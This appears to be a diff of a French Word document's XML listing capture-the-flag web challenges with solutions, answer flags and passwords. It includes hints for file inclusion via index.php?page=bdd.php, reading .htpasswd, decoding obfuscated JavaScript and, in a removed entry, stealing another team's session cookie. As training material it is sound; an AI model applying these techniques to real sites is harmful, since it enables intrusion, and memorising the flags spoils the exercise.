-        <w:t>Analyser l’arborescence et accéder au .</w:t>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Utiliser la fonction </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -11765,7 +11010,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="fr-FR"/>
         </w:rPr>
-        <w:t>htpasswd</w:t>
+        <w:t>unescape</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -11775,7 +11020,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="fr-FR"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve"> sur la variable </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -11785,7 +11030,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="fr-FR"/>
         </w:rPr>
-        <w:t>index.php?page</w:t>
+        <w:t>pass</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -11795,7 +11040,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="fr-FR"/>
         </w:rPr>
-        <w:t>=</w:t>
+        <w:t xml:space="preserve"> et utiliser la fonction String </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -11805,7 +11050,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="fr-FR"/>
         </w:rPr>
-        <w:t>admin</w:t>
+        <w:t>fro</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -11815,19 +11060,8 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="fr-FR"/>
         </w:rPr>
-        <w:t>/.</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>htpasswd</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t> ; char code encapsulée à l’intérieur.</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -11855,7 +11089,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="fr-FR"/>
         </w:rPr>
-        <w:t>M0nmdp$ecure123htpasswd</w:t>
+        <w:t>hDufjdki156</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -11884,7 +11118,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="fr-FR"/>
         </w:rPr>
-        <w:t>C3siteE$tpasSecur3</w:t>
+        <w:t>ADufjdki156</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -11966,7 +11200,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="fr-FR"/>
         </w:rPr>
-        <w:t>http-023</w:t>
+        <w:t>http-021</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -12027,15 +11261,6 @@
         </w:rPr>
         <w:t xml:space="preserve">Objectif de la faille : </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">XSS </w:t>
-      </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
@@ -12044,7 +11269,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="fr-FR"/>
         </w:rPr>
-        <w:t>TeamA</w:t>
+        <w:t>Include</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -12054,7 +11279,66 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="fr-FR"/>
         </w:rPr>
-        <w:t xml:space="preserve"> vs </w:t>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>Difficulté de la faille :</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>3</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Description de la faille : </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Les </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -12064,7 +11348,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="fr-FR"/>
         </w:rPr>
-        <w:t>TeamB</w:t>
+        <w:t>includes</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -12074,67 +11358,19 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="fr-FR"/>
         </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>Difficulté de la faille :</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>4</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Description de la faille : </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>Volez le cookie de session de l'autre équipe pour valider le flag</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> c'est pas sécure et les commentaires non </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>plus..</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -12185,10 +11421,10 @@
           <w:lang w:eastAsia="fr-FR"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40BA98FB" wp14:editId="518B9A91">
-            <wp:extent cx="5391150" cy="4114800"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="19" name="Image 19"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7610E4DD" wp14:editId="0128EE72">
+            <wp:extent cx="5760720" cy="911225"/>
+            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
+            <wp:docPr id="3" name="Image 3"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -12208,6 +11444,941 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
+                      <a:ext cx="5760720" cy="911225"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Solution : </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Utiliser le </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>get</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> page pour entrer sur le serveur, et regarder le code source de la page </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>bdd.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>index.php?page</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>bdd.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Flag de la faille A : </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>M0nmdp$ecure123</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Flag de la faille B : </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>M4bddest$ecure123</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1065"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Nom de la faille :</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>http-022</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Catégorie de la faille </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>http</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Objectif de la faille : </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>Bypass html identification</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>Difficulté de la faille :</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>3</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Description de la faille : </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>Contourner l'identification html et trouvez le mot de passe pour valider l'épreuve</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>Capture d’écran :</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1065"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4EA02A7C" wp14:editId="718AB02C">
+            <wp:extent cx="5029200" cy="1704975"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="18" name="Image 18"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId28"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5029200" cy="1704975"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
